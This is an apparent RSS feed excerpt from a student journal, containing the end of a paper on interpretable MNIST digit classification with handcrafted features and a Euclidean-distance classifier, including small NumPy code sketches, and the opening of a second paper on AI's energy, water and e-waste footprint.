<p>Several topological features are also extracted. Loop count is determined using OpenCV’s findContours function, which detects enclosed regions in the digit’s shape. This is especially informative for digits such as 6, 8, and 9, which may contain one or more loops. The corner count uses Harris corner detection applied to the skeletonized image, which minimizes redundant stroke thickness and enhances precision. Intersection count is calculated by analyzing the number of skeletonized pixels that have more than two white neighbors in an 8-connectivity pattern, which indicates points where strokes cross or branch. Both features provide structural detail critical for distinguishing between digits with similar silhouettes, such as 4 and 9.</p>
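<p>Of these, the intersection count is the easiest to show compactly. The sketch below implements the 8-connectivity test described above in plain NumPy; the loop and corner steps would call OpenCV&#8217;s findContours and cornerHarris on the image and its skeleton, and are omitted here for brevity.</p>

<pre class="wp-block-code"><code>import numpy as np

def intersection_count(skeleton):
    """Count skeleton pixels with more than two 8-connected neighbors,
    i.e., points where strokes branch or cross."""
    padded = np.pad(skeleton, 1)  # zero border avoids edge checks
    count = 0
    ys, xs = np.nonzero(skeleton)
    for y, x in zip(ys, xs):
        # 3x3 neighborhood in the padded image, minus the center pixel
        neighbors = padded[y:y + 3, x:x + 3].sum() - skeleton[y, x]
        if neighbors > 2:
            count += 1
    return count
</code></pre>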



<p>To further enhance the feature set, a symmetry score is calculated by reflecting the image horizontally and vertically and measuring the pixel overlap between the mirrored and original images. This allows for quantification of both vertical and horizontal symmetry, key traits in digits like 0 and 8. Finally, a directional feature is derived by skeletonizing the digit and computing the gradient flow, which is then subjected to a Fourier transform to isolate the dominant direction and its magnitude. This writing direction analysis is further divided across image quadrants, enabling localized directionality insights. Together, these features provide a compact yet rich representation of each digit, making the classification process interpretable and explainable.</p>



<h2 class="wp-block-heading">Classification Strategy</h2>



<p>Following the extraction of handcrafted features from the binarized and skeletonized images, classification is performed using a simple, interpretable method based on Euclidean distance to class averages. This method was chosen over more complex machine learning models to maintain full transparency in decision-making and provide clear insight into how features influence predictions. The pipeline first computes the average feature vector for each digit class (0 through 9) using the 80% training portion of the dataset. These averages represent the typical geometric and topological characteristics of each digit, such as mean loop count for eights or average horizontal symmetry for zeros.</p>



<p>Each feature is then normalized on a 0 to 1 scale across the dataset to prevent features with larger ranges (e.g., dark pixel count) from disproportionately affecting the Euclidean distance computation. Once normalization is complete, the classifier measures the straight-line (L2) distance between each test image’s feature vector and the average vector for each digit class. The digit whose class average yields the smallest distance is assigned as the predicted label for that image.</p>



<p>To enhance flexibility and allow for fine-tuning of the classification process, the system includes support for feature weighting. Each feature can be scaled by a custom weight during distance calculation, effectively increasing or decreasing its influence on the final prediction. This allows for experimentation with different feature importance values, guided by confusion matrices and performance trends. For instance, if corner count is found to be highly discriminative between certain digits (like 4 and 7), its weight can be increased to reflect its higher utility.</p>
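<p>A condensed sketch of this classification strategy, combining per-class mean vectors, min-max normalization, and optional feature weights, is shown below; the names and array shapes are assumptions for illustration, not the project&#8217;s actual code.</p>

<pre class="wp-block-code"><code>import numpy as np

def fit_class_means(X_train, y_train):
    """Average feature vector per digit; rows of X are feature vectors."""
    return np.stack([X_train[y_train == d].mean(axis=0) for d in range(10)])

def predict(X_test, means, lo, hi, weights):
    """Weighted Euclidean distance to each class mean after min-max
    scaling; lo and hi are per-feature extremes from the training set."""
    X = (X_test - lo) / (hi - lo)   # normalize each feature to [0, 1]
    M = (means - lo) / (hi - lo)
    # squared weighted L2 distance from every sample to every class mean
    d2 = ((X[:, None, :] - M[None, :, :]) ** 2 * weights).sum(axis=-1)
    return d2.argmin(axis=1)        # closest class mean wins
</code></pre>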



<p>The classifier outputs a confusion matrix that visualizes the true versus predicted labels across all classes, allowing for targeted diagnosis of where misclassifications occur. The overall accuracy is also computed as the percentage of correct predictions on the test set, providing a concise summary of classifier performance. This baseline approach is not only computationally inexpensive and highly interpretable but also lays the groundwork for more advanced ensemble techniques or data-driven weight optimization in future iterations of the project.</p>



<h2 class="wp-block-heading">Feature Extraction</h2>



<p>Feature extraction is the core component of this project, as it forms the foundation upon which classification is based. Instead of using deep learning to automatically learn features from the data, this project focuses on manually engineered features: interpretable numerical attributes that describe various geometric and visual properties of handwritten digits. These features are designed to help distinguish between digit classes by capturing unique patterns, shapes, and structures in the binary images of the digits (Nguyen &amp; Bai, 2020).</p>



<p>The feature extraction pipeline begins by reading grayscale MNIST digit images, which are normalized and binarized so that white pixels (indicating parts of the digit) are treated as foreground and black pixels as background. From there, a series of handcrafted features are computed. One of the most basic yet important features is the total number of white (foreground) pixels, which provides a rough measure of the digit’s thickness or density.</p>



<p>Another key feature is the bounding box area, which captures the size of the smallest rectangle that contains all white pixels of the digit. This is complemented by the center of mass, a two-dimensional coordinate (x, y) that indicates the average location of the white pixels. Together, these features provide spatial information about the digit&#8217;s spread and balance.</p>



<p>Corners are detected using a skeletonized version of the digit, followed by the Harris corner detection algorithm. This isolates sharp changes in pixel direction and curvature, giving insight into how angular the digit is. A digit like “4” or “7” tends to have many corners, while “0” or “8” might have fewer. In contrast, intersections are defined as pixels in the skeleton with three or more white neighbors: these typically appear at junctions where strokes branch or cross, such as in the middle of a “4” or “8”.</p>



<p>Loop detection is another critical feature. Loops are identified by performing a flood fill on the background and counting the number of enclosed white regions. This helps distinguish looped digits like “8” or “6” from non-looped ones like “1” or “7”.</p>
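<p>One way to realize this is to label the background regions and discard any region that touches the image border; whatever remains is an enclosed hole. The sketch below uses SciPy&#8217;s region labeling as a stand-in for an explicit flood fill, which is an assumption about the implementation.</p>

<pre class="wp-block-code"><code>import numpy as np
from scipy import ndimage

def loop_count(binary_img):
    """Count enclosed background regions (holes) in a 0/1 digit image."""
    background = (binary_img == 0)
    labels, n = ndimage.label(background)  # 4-connected background regions
    # Regions touching the border lie outside the digit, so they are not holes.
    border = np.unique(np.concatenate([
        labels[0, :], labels[-1, :], labels[:, 0], labels[:, -1]]))
    holes = set(range(1, n + 1)) - set(border.tolist())
    return len(holes)
</code></pre>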



<p>Symmetry is calculated in two directions: horizontal and vertical. For horizontal symmetry, the top half of the digit is compared to the flipped bottom half, pixel by pixel. A similar process is used for vertical symmetry. The results are stored as decimal values between 0 and 1, where 1 indicates perfect symmetry. Digits like “8” are highly symmetric, while “5” is less so.</p>
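<p>A compact sketch of the symmetry scores; comparing the whole image against its mirror is essentially equivalent to the half-versus-flipped-half comparison described above, and yields a value between 0 and 1.</p>

<pre class="wp-block-code"><code>import numpy as np

def symmetry_scores(binary_img):
    """Fraction of pixels that match their mirror image; 1.0 is perfect."""
    horiz = (binary_img == np.flipud(binary_img)).mean()  # top vs. bottom
    vert = (binary_img == np.fliplr(binary_img)).mean()   # left vs. right
    return horiz, vert
</code></pre>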



<p>One of the more advanced features is writing direction, which analyzes the dominant flow of pen strokes in the digit. This is estimated by skeletonizing the digit and calculating gradient vectors between connected white pixels. The directions are summarized using angular histograms and averaged over four image quadrants to better capture local directional trends. The result includes both magnitude (the strength of directional flow) and angle (the orientation), which help differentiate digits based on how they are drawn: for example, a “2” may show strong rightward curvature, while a “7” may show sharp vertical and diagonal transitions.</p>
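<p>A simplified sketch of the per-quadrant direction analysis follows; it replaces the Fourier step with a resultant-vector average of local gradient angles, which yields a comparable dominant angle and magnitude but is an approximation, not the study&#8217;s exact method.</p>

<pre class="wp-block-code"><code>import numpy as np

def quadrant_directions(skeleton):
    """Dominant stroke direction (angle, magnitude) for each quadrant."""
    h, w = skeleton.shape
    results = []
    for rows in (slice(0, h // 2), slice(h // 2, h)):
        for cols in (slice(0, w // 2), slice(w // 2, w)):
            gy, gx = np.gradient(skeleton[rows, cols].astype(float))
            mask = (gx ** 2 + gy ** 2) > 0
            angles = np.arctan2(gy[mask], gx[mask])
            # The resultant vector's angle is the dominant direction;
            # its normalized length is the strength of that flow.
            vec = np.exp(1j * angles).sum()
            results.append((np.angle(vec), abs(vec) / max(mask.sum(), 1)))
    return results
</code></pre>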



<p>Finally, quarter-based features are also computed by dividing each image into four equal parts. For each quadrant, features like pixel density, average stroke width, and gradient flow are independently measured. This adds a layer of localized spatial analysis and can be particularly helpful when digits share global features but differ in their layout, such as “9” vs “4”.</p>



<p>In summary, the feature extraction process converts raw MNIST image data into a structured vector of interpretable numeric features that describe the digit&#8217;s shape, structure, and writing dynamics. These features are exported into a CSV file for use in the classification stage, enabling an interpretable, modular approach to handwritten digit recognition.</p>



<h2 class="wp-block-heading">Classification Pipeline</h2>



<p>Following feature extraction, digit classification was performed using a distance-based approach. Rather than leveraging external machine learning libraries, a custom nearest-centroid classifier, similar in spirit to K-Nearest Neighbors (KNN) but comparing against class averages rather than individual neighbors, was implemented from scratch. The classifier calculates the Euclidean distance between each test image’s feature vector and the average feature vector of each digit class (0–9) computed from the training set.</p>



<p>Before computing distances, feature values were normalized to a [0,1] range using min-max scaling to avoid bias due to differing numeric scales. Additionally, the system allows for feature weighting, meaning that more important features (e.g., symmetry or loop count) can be assigned higher influence during classification. This modular design supports experimentation with different weighting schemes to optimize accuracy.</p>



<p>The model evaluates its predictions using a confusion matrix, precision metrics, and accuracy scores, enabling quantitative comparison of different feature sets and weighting strategies. Errors are visually inspected to guide iterative refinement of the feature extraction and classification logic.</p>



<h2 class="wp-block-heading">Dataset and Experimental Setup</h2>



<p>For this study, we utilized the MNIST dataset, a well-known benchmark for handwritten digit recognition. The full dataset consists of 70,000 labeled grayscale images of handwritten digits (0–9), each of size 28×28 pixels. Of these, 60,000 images are used for training and 10,000 for testing. However, in our experiment, we implemented a custom CSV-based approach using a limited subset of the MNIST data. Specifically, we processed and extracted features from a fixed number of samples per digit to maintain class balance and control computational complexity.</p>



<p>The system was designed in two main phases: feature extraction and classification. In the feature extraction phase, each image was transformed into a row in a CSV file, where each column represented a manually engineered feature such as pixel count, loop count, symmetry, bounding box, intersection count, etc. In total, over 20 distinct features were extracted and used in the classification phase.</p>



<p>The classification phase was implemented using a custom Euclidean distance classifier. For each digit class (0–9), we computed the average feature vector across the training samples. When a new test image was presented, its features were compared against each of the class averages using Euclidean distance, and the closest class was chosen as the prediction.</p>



<p>Additionally, we introduced feature weighting, allowing specific features to have more or less influence during classification based on their discriminative power. The classification results were tracked and evaluated using accuracy metrics and confusion matrices.</p>



<h2 class="wp-block-heading">Accuracy and Confusion Matrix</h2>



<p>The performance of the classifier was evaluated using a confusion matrix, which visually represents the number of correct and incorrect predictions for each digit. This matrix enabled us to quickly identify which digits were most frequently misclassified and which were most accurately predicted.</p>



<p>The initial model, without any feature weighting or tuning, achieved a moderate classification accuracy, with particularly strong performance on digits like “0” and “1,” which have distinct visual structures. Digits such as “5” and “3” were more commonly confused with each other due to their visual similarity, particularly in cursive or stylized handwriting.</p>



<p>After iteratively tuning the feature weights, we observed a notable improvement in classification performance, especially in reducing confusion between closely related digits. For example, giving more weight to loop count, intersections, and writing direction significantly helped in distinguishing digits like “6,” “8,” and “9.”</p>



<p>At its best configuration, the system reached an overall accuracy of 50.81%, with some digits like “1,” “0,” and “8” achieving near-perfect classification. The confusion matrix clearly reflected the impact of feature weighting, with off-diagonal errors shrinking in many digit classes.</p>



<p>To assess which features contributed most effectively to accurate digit classification, a series of weight tuning experiments and feature ablation tests were conducted. These experiments involved systematically adjusting the importance (weight) of individual features during the classification process and observing the resulting changes in accuracy. This approach allowed us to isolate the features with the greatest impact on distinguishing between visually similar digits.</p>



<p>One of the most consistently useful features was pixel count, which reflects the total number of non-background pixels in the digit image. This feature helped differentiate digits with dense strokes, like “8,” from those with minimal writing, such as “1.” Similarly, loop count proved to be highly informative, especially for identifying digits like “8,” which contains two loops, versus digits such as “0,” “6,” or “9,” which have one loop, and digits like “1” or “7,” which have none.</p>



<p>The corner count and intersection count, both derived from the skeletonized version of the digit, played a key role in identifying digits that involve sharp turns or complex branch-like structures. Digits such as “4” and “8” exhibited higher intersection counts due to multiple connecting lines, while digits like “1” and “7” had noticeably fewer corners. However, corner detection was found to be sensitive to image noise and line thickness, and improvements were made by fine-tuning the skeletonization algorithm (Siddiqi &amp; Pizer, 2008).</p>



<p>Another valuable set of features came from analyzing symmetry. Horizontal and vertical symmetry scores helped to recognize digits with more balanced structures, such as “0,” “3,” and “8.” In contrast, digits like “5” and “2” exhibited more asymmetry, which aided in distinguishing them from others. Symmetry-based features were particularly helpful when pixel count or loops were not sufficient on their own.</p>



<p>Finally, one of the most advanced features used was the writing direction, computed from gradient vectors and angular motion across the digit’s skeleton. This feature helped capture the natural drawing flow of digits. For example, “2” typically starts with a curve that swings from the top left to the bottom right, while “5” often features a left-facing arc followed by a vertical drop. By dividing the image into quadrants and calculating directional vectors in each section, we were able to capture both global and local movement trends that further improved digit differentiation.</p>



<p>Overall, the combination of these features, both geometric and dynamic, provided a diverse and interpretable representation of handwritten digits. When these features were strategically weighted, they significantly improved the system’s ability to correctly classify even the most visually ambiguous samples.</p>



<h2 class="wp-block-heading">Visualization and Debugging</h2>



<p>Visualization tools played a crucial role in understanding model behavior. For each test sample, the system could plot the digit image, highlight detected corners, intersections, center of mass, bounding box, and even draw gradient arrows representing writing direction. These visuals helped validate that the feature extractor was working correctly and guided the adjustment of skeletonization, thresholding, and corner detection parameters (Siddiqi &amp; Pizer, 2008).</p>



<p>Skeletonization outputs, in particular, revealed occasional anomalies, such as overly thick or broken lines due to imperfect thresholding. These were later corrected through pre-processing steps and adaptive thinning (Siddiqi &amp; Pizer, 2008).</p>



<h2 class="wp-block-heading">Summary of Results</h2>



<p>Overall, the experimental results demonstrated that an interpretable, feature-based classifier can achieve reasonable performance on a complex task like digit recognition. While not competitive with modern convolutional neural networks (CNNs), this approach provides clear insights into how features contribute to classification. The system’s modularity also makes it easy to extend, optimize, and debug.</p>



<p>The key takeaway is that careful feature engineering and visualization can go a long way in building effective and explainable machine learning models: even for tasks typically reserved for deep learning (Nguyen &amp; Bai, 2020).</p>



<h2 class="wp-block-heading">Strengths of the Approach</h2>



<p>One of the major strengths of this handwritten digit classification system is the interpretability of the features used. Unlike black-box models such as neural networks, which can achieve high accuracy but offer little transparency, this approach relies on intuitive and human-understandable features, such as corner counts, pixel density, symmetry, and writing direction. These features provide not only a basis for classification but also a valuable window into the structure and characteristics of handwritten digits. This makes the model especially useful for educational purposes, explainable AI research, and deployment in systems where traceability of decisions is important.</p>



<p>Additionally, the design emphasizes customization and modular testing. Because each feature is extracted individually and can be visualized, the model allows for fine-grained analysis of each image. Visualization tools, such as skeleton overlays, direction arrows, and bounding boxes, enhance interpretability and assist in identifying both successful and problematic classifications. Moreover, the implementation of feature weighting allows for dynamic tuning of the classifier to prioritize certain distinguishing characteristics for specific digits, significantly improving the robustness of the model.</p>



<h2 class="wp-block-heading">Limitations</h2>



<p>Despite these strengths, the system also has notable limitations. First, feature-based classification is inherently less flexible than deep learning models. While convolutional neural networks can learn thousands of nuanced features from training data, this system relies on a fixed set of manually engineered features. As a result, it may struggle to adapt to unusual handwriting styles or generalize to out-of-distribution samples (Nguyen &amp; Bai, 2020).</p>



<p>Second, while some features such as pixel count and symmetry are stable across digits, others—particularly corner and intersection counts—are sensitive to noise and variations in stroke width. Even after applying skeletonization and refinement techniques, some digits still exhibit spurious feature detections in areas of high stroke density. These inaccuracies can mislead the classifier, especially for digits like “5” and “9” that have subtle structural differences (Siddiqi &amp; Pizer, 2008).</p>



<p>Another challenge arises from the uniform scaling of feature distances. Since all features are normalized to the same scale before Euclidean distance is calculated, differences in feature stability and importance can be overlooked unless explicitly corrected with proper weighting. Without optimized weights, the classifier may be biased toward features that have larger variance or noise, reducing accuracy.</p>



<h2 class="wp-block-heading">Implications for Future Work</h2>



<p>The findings from this system reinforce the idea that simple, interpretable features can still perform competitively on classification tasks when properly designed and tuned. This supports the value of feature engineering in settings where model explainability is critical. Additionally, the ability to visualize the contribution of each feature creates opportunities for human-in-the-loop optimization and error analysis.</p>



<p>These results also open the door to future hybrid approaches. By combining the transparent logic of engineered features with the pattern recognition strength of machine learning models, it may be possible to create hybrid systems that provide both high accuracy and clear explanations. In educational settings, this system can serve as a baseline for teaching students the fundamentals of computer vision and classification without the overhead of deep learning frameworks (Nguyen &amp; Bai, 2020).</p>



<p>Finally, the architecture’s modularity makes it well-suited for experimentation with novel features. Techniques like stroke order estimation, writing speed simulation, or temporal reconstruction of digit drawing paths may offer further improvements. The flexibility and transparency of the current system provide a solid foundation for continued exploration.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>This research project presents an interpretable, feature-based approach to handwritten digit classification using the MNIST dataset. Unlike black-box deep learning models, the method relies on clearly defined, explainable features such as pixel count, symmetry, corner and intersection detection, writing direction via Fourier and gradient analysis, and geometric properties like bounding boxes and centers of mass. Through careful engineering and visualization of these features, the system offers valuable insight into how digits can be uniquely characterized by their visual structure (Nguyen &amp; Bai, 2020).</p>



<p>The classifier itself uses a weighted Euclidean distance algorithm to compare new digit samples to statistical averages derived from a training set. This approach allows the model to make data-driven predictions while maintaining transparency and flexibility. Results were visualized via confusion matrices, highlighting both successful classifications and areas where the model struggled, such as differentiating between visually similar digits like 4 and 9. Weight adjustments to the features significantly improved accuracy by emphasizing the most discriminative properties.</p>



<p>One of the key contributions of this work lies in the balance between accuracy and interpretability. While modern deep learning approaches may achieve higher performance metrics, they often sacrifice explainability. This project demonstrates that through methodical feature selection and modular design, it is possible to achieve strong classification performance without abandoning transparency (Nguyen &amp; Bai, 2020).</p>



<p>Looking forward, this framework serves as a robust foundation for further research into human-interpretable machine learning systems. By continuing to refine feature definitions, integrating hybrid techniques, and addressing edge cases through new innovations like stroke order simulation, the model can evolve to rival more complex approaches—while remaining understandable and trustworthy.</p>



<p>In conclusion, this project highlights the potential of interpretable, modular AI systems to achieve meaningful results in computer vision tasks, with wide-ranging applications in education, transparency-focused AI development, and real-world deployment where explainability is paramount.</p>



<h2 class="wp-block-heading">References</h2>



<p>Fan, Y., Zhao, X., Wang, L., Wang, W., Wang, S., &amp; Xu, M. (2021). A review on interpretability of artificial neural networks. <em>Frontiers in Neurorobotics, 15</em>, 752666. <a href="https://doi.org/10.3389/fnbot.2021.752666">https://doi.org/10.3389/fnbot.2021.752666</a></p>



<p>Lipton, Z. C. (2018). The mythos of model interpretability: In machine learning, the concept of interpretability is both important and slippery. <em>Communications of the ACM, 61</em>(10), 36–43. https://doi.org/10.1145/3233231</p>



<p>Lundberg, S. M., &amp; Lee, S.-I. (2017). A unified approach to interpreting model predictions. <em>Advances in Neural Information Processing Systems, 30</em>. https://proceedings.neurips.cc/paper_files/paper/2017/hash/8a20a8621978632d76c43dfd28b67767-Abstract.html</p>



<p>Nguyen, T. T., &amp; Bai, L. (2020). A review of traditional and deep learning-based feature descriptors for image classification. <em>Journal of Big Data, 7</em>(1), 1–32. https://link.springer.com/article/10.1186/s40537-020-00327-4</p>



<p>Siddiqi, K., &amp; Pizer, S. M. (2008). <em>Medial representations: Mathematics, algorithms and applications</em>. Springer. https://link.springer.com/book/10.1007/978-1-4020-8658-3</p>



<p>Xie, S., &amp; Tu, Z. (2015). Holistically-nested edge detection. In <em>Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition</em> (pp. 1395–1403). https://openaccess.thecvf.com/content_cvpr_2015/html/Xie_Holistically-Nested_Edge_Detection_2015_CVPR_paper.html</p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Austin Benedicto
</h5><p>Austin is a 12th grade student at the Nichols School in Buffalo, New York. He enjoys studying computer science and robotics in school. Austin has been involved in the FIRST Robotics program at his school for the last 8 years, serving as a team member and mentor to younger students. He also served as project manager on the coding sub-team and has an interest in artificial intelligence.


</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance/">Interpretable Digit Classification using Handcrafted Features and Euclidean Distance</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Uncover The Hidden Environmental Cost of AI</title>
		<link>https://exploratiojournal.com/uncover-the-hidden-environmental-cost-of-ai/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=uncover-the-hidden-environmental-cost-of-ai</link>
		
		<dc:creator><![CDATA[Stavros Farsedakis]]></dc:creator>
		<pubDate>Sun, 12 Oct 2025 20:01:25 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4383</guid>

					<description><![CDATA[<p>Stavros Farsedakis<br />
Pine Crest School</p>
<p>The post <a href="https://exploratiojournal.com/uncover-the-hidden-environmental-cost-of-ai/">Uncover The Hidden Environmental Cost of AI</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Stavros Farsedakis<br><strong>Mentor</strong>: Dr. Hong Pan<br><em>Pine Crest School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>Everyone&#8217;s talking about AI, but no one&#8217;s talking about its hidden cost. We think of AI as this invisible &#8220;cloud,&#8221; but it&#8217;s built on a massive network of data centers guzzling energy, water, and hardware. The stats are wild: a single data center can use as much electricity as a whole city, and training one AI model can burn through enough energy to power over 100 homes for a year. On top of that, these places use billions of gallons of water for cooling, a serious problem in a world dealing with droughts. The tech gets old super fast, creating a mountain of e-waste five times faster than we can recycle it.</p>



<p>This paper exposes the shady side of AI, where companies hide their environmental impact behind outdated metrics and a total lack of transparency. But it&#8217;s not all bad news. We&#8217;re also exploring how we can fix this mess with cool tech like &#8220;Green AI,&#8221; new policies, and a shift to renewable energy. It&#8217;s time to make AI not just smart but sustainable.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1716" height="984" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.48.31-PM.webp" alt="" class="wp-image-4384"/></figure>



<h2 class="wp-block-heading">Introduction </h2>



<p>Artificial intelligence has become a powerful technology in our world, but its true environmental cost is rarely shown. While we interact with AI through the concept of cloud computing, this technology is built on a physical network of large data centers that use massive amounts of resources. As AI models have grown, a significant problem has emerged: developers are not required to disclose the energy or carbon footprint of their systems. This lack of transparency makes it difficult for anyone to understand the full environmental impact. To address this gap, this paper proposes a simple &#8220;nutrition label&#8221; for AI models, called the Model Carbon-Disclosure Standard (MCDS). This label would show key metrics like the energy consumed and carbon generated, making the environmental cost clear and comparable. </p>
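<p>To make the proposal concrete, the sketch below shows what an MCDS &#8220;nutrition label&#8221; might look like as a structured record. Every field name and value here is hypothetical, since no such standard has been published; the numbers are placeholders of roughly the magnitudes discussed later in this paper.</p>

<pre class="wp-block-code"><code>from dataclasses import dataclass

@dataclass
class ModelCarbonLabel:
    model_name: str
    training_energy_kwh: float     # total energy consumed during training
    training_co2e_tons: float      # carbon generated, in CO2-equivalent
    inference_wh_per_query: float  # average energy per user query
    cooling_water_liters: float    # water attributable to training
    grid_region: str               # where the electricity was drawn

# Illustrative placeholder values only
label = ModelCarbonLabel(
    model_name="example-large-model",
    training_energy_kwh=1_300_000,
    training_co2e_tons=550,
    inference_wh_per_query=3.0,
    cooling_water_liters=700_000,
    grid_region="US-Central",
)
</code></pre>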



<p>The idea of a disclosure framework is not new. The Greenhouse Gas (GHG) Protocol gives a global way to measure emissions, and groups like the Carbon Disclosure Project (CDP) encourage companies and governments to share their environmental impacts with investors and the public. As the market demands more of this transparency, it becomes increasingly important for a company&#8217;s financial and competitive standing. </p>



<p>The environmental footprint of computing has evolved over time. In the early days, concerns were mostly focused on the toxic byproducts from manufacturing devices. With the growth of big data and cloud computing, attention turned to the heavy energy and water consumption of data centers, the real buildings that the term “cloud” often hides. Globally, the number of data centers has exploded in just the past decade. (“Measuring AI’s Energy/Environmental Footprint to Assess Impacts,” 2025) </p>



<p>The emergence of AI has dramatically accelerated these trends. AI tasks are far more energy-intensive than traditional computing. Training large AI models, for instance, requires a tremendous amount of energy, and even a single question to a chatbot like ChatGPT can use far more electricity than a normal Google search. Since this energy demand is so intense and unpredictable, AI is considered an environmental risk whose full impact is difficult to measure. This paper will explore these challenges in detail and outline a path toward a more transparent and sustainable future for AI. </p>



<h2 class="wp-block-heading">Current Status </h2>



<p>Artificial intelligence, often thought of as an invisible &#8220;cloud,&#8221; is, in reality, built upon a very real and physical foundation of massive data centers. As AI technology becomes more advanced and common in our daily lives, its environmental footprint, in the form of energy, water, and waste, is growing at a rapid pace, creating significant new challenges. </p>



<h4 class="wp-block-heading">The Energy Appetite of AI and Data Centers </h4>



<p>The energy consumption of these data centers, which had been fairly steady for many years, has recently surged because of the boom in AI. In 2023, data centers used about 4.4% of all electricity in the United States, a number that is projected to double or even triple by 2028, reaching up to 12% of the nation&#8217;s total electricity demand. (Increase in Electricity Demand from Data Centers, 2024) To put that into perspective, by 2030, a large data center could use as much electricity as an entire city, and globally, data center electricity use is expected to more than double by the end of the decade. This unexpected and fast growth is putting pressure on power grids, and sometimes utilities keep old, polluting coal plants running longer to meet the demand. </p>



<p>AI tasks use far more energy than traditional computing. Training a large AI model like GPT-3, for instance, consumed enough energy to power about 120 average U.S. homes for a full year. This process also generated a carbon footprint equal to the yearly emissions of 123 gasoline-powered cars. For more common uses, a single question to a chatbot like ChatGPT can use nearly 10 times the electricity of a normal Google search. When you get into more complex tasks, the energy use skyrockets. Creating a five-second AI video, for example, can use about as much electricity as keeping a TV on all day. </p>



<p>Despite these impacts, the industry&#8217;s environmental footprint is very opaque due to a lack of clear and consistent reporting. For example, companies often use outdated metrics like Power Usage Effectiveness (PUE) that only measure a facility&#8217;s efficiency and not how efficiently the actual computer hardware is working. This means a data center can seem efficient on paper while still being very wasteful. A major issue is how companies report their emissions under the Greenhouse Gas (GHG) Protocol, a global framework for measuring emissions, which are categorized into Scope 1 (direct), Scope 2 (from purchased electricity), and Scope 3 (from the value chain, like manufacturing). The purchase of renewable energy credits can hide a company&#8217;s real emissions and make it seem much greener than it is. One analysis of a major company&#8217;s 2022 data found that while its publicly reported emissions were only 273 metric tons of carbon, its actual emissions from the local power grid were over 3.8 million metric tons, a difference of nearly 14,000 times. This gap in reporting creates a situation where companies are not encouraged to focus on energy efficiency because there are no clear standards to hold them accountable. </p>
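<p>A small worked example shows why PUE alone can mislead; the numbers below are invented for illustration.</p>

<pre class="wp-block-code"><code>def pue(total_facility_kwh, it_equipment_kwh):
    """Power Usage Effectiveness: total facility energy over IT energy.
    1.0 is the theoretical ideal."""
    return total_facility_kwh / it_equipment_kwh

# A facility drawing 1.2 GWh, of which 1.0 GWh reaches the servers,
# scores a respectable PUE of 1.2 even if those servers sit mostly
# idle; useful work per kilowatt-hour never enters the metric.
print(round(pue(1_200_000, 1_000_000), 2))  # 1.2
</code></pre>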



<p>One powerful solution to this challenge is a proactive approach to energy sourcing. The Massachusetts Green High Performance Computing Center in Holyoke is an excellent example. This data center is primarily powered by a nearby hydroelectric station, which creates a direct and reliable source of clean energy from the very beginning, rather than relying on a power grid that is heavily dependent on fossil fuels. </p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="1716" height="1250" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-12-at-8.51.24-PM.webp" alt="" class="wp-image-4385"/><figcaption class="wp-element-caption">Figure 1: Projected Growth in Data Center Electricity Use from AI (2022-2030). This chart is a powerful wake-up call, visually showing how AI&#8217;s rapid expansion is creating a massive and growing demand for electricity. As you can see, data centers are set to more than double their electricity consumption by the end of the decade, putting a huge strain on our global power grids. The lines climbing steeply, especially for the U.S. and China, reveal that these countries alone are projected to account for nearly 80% of this growth, a trend that&#8217;s already forcing utilities to keep older, polluting power plants running longer to keep up with demand. This isn&#8217;t just a distant problem; it&#8217;s a real and immediate one that&#8217;s making it harder to transition to clean energy. This image shows us that AI&#8217;s convenience comes with a significant and often hidden environmental cost. (Chen, 2025) </figcaption></figure>



<h4 class="wp-block-heading">AI&#8217;s Thirst for Water </h4>



<p>AI&#8217;s energy demands also create a huge need for water. The powerful computer chips in data centers generate enormous heat, and water is used for cooling to prevent them from breaking down. A single large data center can consume up to 5 million gallons of water every day, which is enough to supply a town of 10,000 to 50,000 people. To show this on a larger scale, Google’s global data centers consumed about 4.3 billion gallons of water in one year, enough to give every person in the United States about 13 gallons. This consumption becomes especially serious in water-stressed regions. In Texas, where the state has been dealing with a severe drought, data centers are projected to use nearly 400 billion gallons of water by 2030, which represents almost 6.6% of the state’s total water usage. While residents are asked to cut back, these new facilities use millions of gallons daily with little public notice. (Texas Data Centers Use 50 Billion Gallons of Water, 2025) As one water policy analyst noted, there is often no requirement for data centers to talk to communities about their water use, which hides much of their environmental impact. </p>



<p>Some innovators are tackling this problem head-on. In Finland, a country with a cold climate, a data center has been designed to operate without traditional mechanical cooling systems. Instead, it uses a system that relies on cold outdoor air or even seawater from the Baltic Sea to cool its servers, which dramatically reduces its energy and water footprint. Even more impressively, the waste heat from the servers is captured and sent to a local district heating network to warm nearby homes and businesses. This creates a win-win situation where the data center not only reduces its own impact but also helps the community use less fossil fuels for heating. </p>



